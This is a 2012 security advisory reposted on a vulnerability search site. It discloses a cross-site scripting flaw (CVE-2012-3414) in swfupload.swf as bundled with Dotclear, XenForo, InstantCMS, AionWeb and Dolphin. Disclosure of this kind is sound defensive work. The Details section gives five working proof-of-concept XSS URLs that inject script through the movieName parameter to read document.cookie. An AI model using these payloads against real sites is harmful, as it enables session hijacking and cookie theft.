Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

SWF Upload Cross Site Scripting

Related Vulnerabilities: CVE-2012-3414  
Publish Date: 13 Nov 2012
Author: MustLive
Source 
                							

                Hello list!

I will draw your attention to XSS vulnerability in other web applications 
with swfupload. Earlier I've wrote about swfupload in WordPress 
(CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of 
this swf-file (with different names) and all versions of WordPress, which 
contain any of these swf-files. And here is information about Dotclear, 
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications 
which are bundled with swfupload.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, 
Dolphin. There is no information that they have fixed this vulnerability in 
their software (at that this vulnerability was fixed in WordPress 3.3.2 at 
20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this 
vulnerability was fixed and patch was released for previous versions 
(already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did 
the developers of XenForo), which could be used by all web developers, which 
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web 
applications. There are many web applications with it, not as many as those 
which are using JW Player (http://securityvulns.com/docs28176.html) and JW 
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in 
them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started